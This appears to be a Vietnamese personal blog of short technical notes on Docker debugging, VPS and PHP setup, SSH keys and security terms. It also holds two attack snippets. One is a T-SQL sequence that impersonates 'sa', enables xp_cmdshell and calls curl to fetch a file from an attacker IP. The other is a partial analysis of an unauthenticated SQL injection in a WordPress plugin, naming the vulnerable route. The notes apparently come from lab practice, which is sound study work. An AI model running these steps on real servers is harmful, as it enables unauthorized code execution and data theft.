Bài đăng

Debug Nodejs via Docker

Hình ảnh
Bạn cần một tâm hồn đẹp trước khi làm cái này. Mình tốn kha khá thời gian đọc shjtposting và xem youtube đấy nên tóm lại cho nhanh Bước 1: Chuẩn bị source code, mình sẽ demo với cấu trúc dự án basic như này Bước 2: Tạo Dockerfile chứa nội dung sau file này sẽ chạy chương trình ở port 1337 và sẽ chạy chế độ debug ở port 9229 mình sẽ nói sau Bước 3: Trong package.json thêm đoạn này vô, chú ý port 9229 là để mở debug ở 9229. Thực ra nó cũng được mà chả cũng không. Vì mình làm theo nhiều clip quá nên h cứ bị lộn xào đấy :v Bước 4: Trong file launch.json thì sửa như này  Bước 5: Build docker  docker build -t konchan . docker run -d -p 1337:1337 -p 9229:9229 -V Bước 6: Vô web và dùng Inspect như thường

Deploy python web

 Ta dùng docker và forward port ra ngoài thôi, chứ kia mình không biết :< sudo apt install docker-compose docker-io

Cài đặt VPS ubuntu và chạy web php

Hình ảnh
Bài này mình sẽ hướng dẫn cho các bạn triển khai web chạy php, mysql, nginx - Cài đặt firewall     +  sudo apt install ufw - Kiểm tra firewall có bật không      + sudo ufw status - Cho phép ssh      + sudo ufw allow ssh     +  sudo ufw allow 22      + sudo ufw allow from <ip> - Update lại hệ thống và cài đặt nginx     +  sudo apt update     +  sudo apt install nginx - Kiểm tra lại nginx đã bật hay chưa.     + sudo ufw app list Như thế này thì các bạn đã có thể truy cập thông qua ip rồi nhé, nó sẽ ở thư mục /var/www/html/<chjt_loli> - Cài đặt mysql-server sudo apt install mysql-server - Cài đặt các gói cho php      + apt install php-fpm php-mysql - Sửa file /etc/nginx/sites-enabled/defautl để nhận đuôi php     +  sudo nano /etc/nginx/sites-enabled/default          -> index.php - Reload lại      +  sudo systemctl reload nginx

Tạo khóa ssh cho user

ssh-keygen -t rsa -f konchan copy konchan.pub vo thu muc authr... login bang private key

Thuat ngu

 Access Control List (ACL)  Access Control Entries (ACEs) - Discretionary Access Control List (DACL): check for level of access - System Access Control Lists (SACL) Access denied ACE Access allowed ACE System audit ACE Domain trust - Parent-child - Cross-link - External - Tree-root - Forest - Enhanced Security Admin Environment (ESAE) Network Interface Card (NIC) card mạng Carrier Sense Multiple Access with Collision Detection (CSMA/CD) Windows Management Instrumentation Command-line (WMIC) Web-Based Enterprise Management (WBEMc) New Technology Directory Services Directory Information Tree (NTDS.DIT) Microsoft’s Active Directory Domain Services (AD DS) User Account Control (UAC) Dynamic Link Library (DLL) BPA (Block Public Access) Fully Qualfied Domain Name (FQDN) Public key infrastructure ( PKI)

Thực thi RCE via MSSQL CLI

-- Switch to the 'sa' user context EXECUTE AS LOGIN='sa'; -- Enable advanced options EXECUTE sp_configure 'show advanced options', 1; RECONFIGURE; -- Enable xp_cmdshell EXECUTE sp_configure 'xp_cmdshell', 1; RECONFIGURE; -- Use xp_cmdshell to download the file using curl EXECUTE xp_cmdshell "curl http://10.10.14.61:1234/a";

Kiểm tra các kết nối ẩn với máy tính

netstat -abf 5  Lệnh này sẽ liệt kê các kết nối với Internet. Nếu có link lạ, có thể đó là virus

Setup máy ảo

 Setup  Download vulnbox va import tren may attacker and client chuyen thanh only host adapter Nho set cable connect nmap -pn ip/24 de detect client ip

CVE-2024-27956

Hình ảnh

Phân tích CVE-2023-23488

Hình ảnh
 Phân tích CVE-2023-23488 Mỗt lỗ hổng SQL Injection không xác thực ảnh hưởng đến tất cả phiên bản <2.9.8 của plugin Paid Memberships Pro của Wordpress. Tham khảo Mình cài bản 2.9.6 Trong bài viết, lỗ hổng được đề cập nằm ở tham số code tại REST route.  Tại file rest-api.php ta thấy nó có gọi đến hàm pmpro_rest_api_permissions_get_order() Để truy cập vô thì ta sẽ truy cập đường dẫn sau  http://localhost/wordpress/wp-json/pmpro/v1/order Nhảy đến hàm  pmpro_rest_api_permissions_get_order() Thấy rằng nếu method là GET, route là /pmpro/v1/order và không có permission thì đoạn if sẽ được thực thi Chú ý vào vào biến $code, có thể điều khiển được giá trị đầu vào. Input chưa được sanitize được đưa thẳng vô class MemberOrder.  Nhảy đến class này để kiểm tra, thấy được đưa vô đối số $id Đoạn if kiểm tra nếu $id là số thì gọi đến hàm getMemberOrderByID, còn không thì gọi đến getMemberOrderByCode. Trong trường hợp này chúng ta sẽ truyền giá trị không phải là số, hãy xem hàm getMemberOrderByCode(